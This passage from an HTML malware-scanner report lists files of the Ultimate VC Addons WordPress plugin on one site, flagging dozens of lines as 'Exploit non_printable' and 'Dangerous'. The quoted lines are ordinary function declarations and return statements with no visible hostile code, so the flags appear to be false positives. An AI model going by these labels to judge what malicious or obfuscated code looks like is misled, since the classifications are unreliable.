</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_team_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 184</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">"get_ultimate_font_family" </span><span style="color: #007700">) ? </span><span style="color: #0000BB">get_ultimate_font_family</span><span style="color: #007700">( </span><span style="color: #0000BB">$team_member_description_font </span><span style="color: #007700">) : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_team_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 551</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 553</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_team</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 554</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_308").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_interactive_banners.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 25.90 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_309" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'AIO_Interactive_Banners'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$AIO_Interactive_Banners </span><span style="color: #007700">= new </span><span style="color: #0000BB">AIO_Interactive_Banners</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_interactive_banner' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_interactive</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_ib_banner_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 422</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats banner</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">banner_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 608</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_309").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_expandable_section.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 39.11 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_310" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } function </span><span style="color: #0000BB">ultimate_ultimate_exp_section</span><span style="color: #007700">() { if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Expandable Section"</span><span style="color: #007700">), </span><span style="color: #DD0000">"base" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"ultimate_exp_section"</span><span style="color: #007700">, </span><span style="color: #DD0000">"icon"</span><span style="color: #007700">=> </span><span style="color: #DD0000">"uvc_expandable"</span><span style="color: #007700">, </span><span style="color: #DD0000">"class" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"uvc_expandable"</span><span style="color: #007700">, </span><span style="color: #DD0000">"as_parent" </span><span style="color: #007700">=> array(</span><span style="color: #DD0000">'except'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_exp_scripts</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_family'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'get_ultimate_font_style'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_exp_section_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts </span><span style="color: #007700">,</span><span style="color: #0000BB">$content</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_ultimate_exp_section</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 464</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_310").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_parallax.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 68.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 23</span><br><table id="file_311" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hex</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1549</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_scripts</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_theme_after_vc_row' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1574</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">vc_theme_after_vc_row</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">VC_Ultimate_Parallax</span><span style="color: #007700">::</span><span style="color: #0000BB">parallax_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'hex2rgbUltParallax'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1580</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hex2rgbUltParallax</span><span style="color: #007700">(</span><span style="color: #0000BB">$hex</span><span style="color: #007700">, </span><span style="color: #0000BB">$opacity</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'rgba('</span><span style="color: #007700">.</span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">","</span><span style="color: #007700">, array(</span><span style="color: #0000BB">$r</span><span style="color: #007700">, </span><span style="color: #0000BB">$g</span><span style="color: #007700">, </span><span style="color: #0000BB">$b</span><span style="color: #007700">)).</span><span style="color: #DD0000">','</span><span style="color: #007700">.</span><span style="color: #0000BB">$opacity</span><span style="color: #007700">.</span><span style="color: #DD0000">')'</span><span style="color: #007700">; </span><span style="color: #FF8000">// returns the rgb values separated by commas, ready for usage in a rgba( rr,gg,bb,aa ) CSS rule</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #0000BB">$r</span><span style="color: #007700">, </span><span style="color: #0000BB">$g</span><span style="color: #007700">, </span><span style="color: #0000BB">$b</span><span style="color: #007700">); </span><span style="color: #FF8000">// alternatively, return the code as an array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1594</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">""</span><span style="color: #007700">; </span><span style="color: #FF8000">// input string is not a valid hex color code - return a blank value; this can be changed to return a default colour code for example</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'rgbaToHexUltimate'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1599</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rgbaToHexUltimate</span><span style="color: #007700">(</span><span style="color: #0000BB">$r</span><span style="color: #007700">, </span><span style="color: #0000BB">$g</span><span style="color: #007700">, </span><span style="color: #0000BB">$b</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hex</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">execute_ultimate_vc_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$output</span><span style="color: #007700">, </span><span style="color: #0000BB">$obj</span><span style="color: #007700">, </span><span style="color: #0000BB">$attr</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parallax_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parallax_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_remove_param'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 470</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_param'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_311").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_link.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 22.81 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 10</span><br><table id="file_312" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
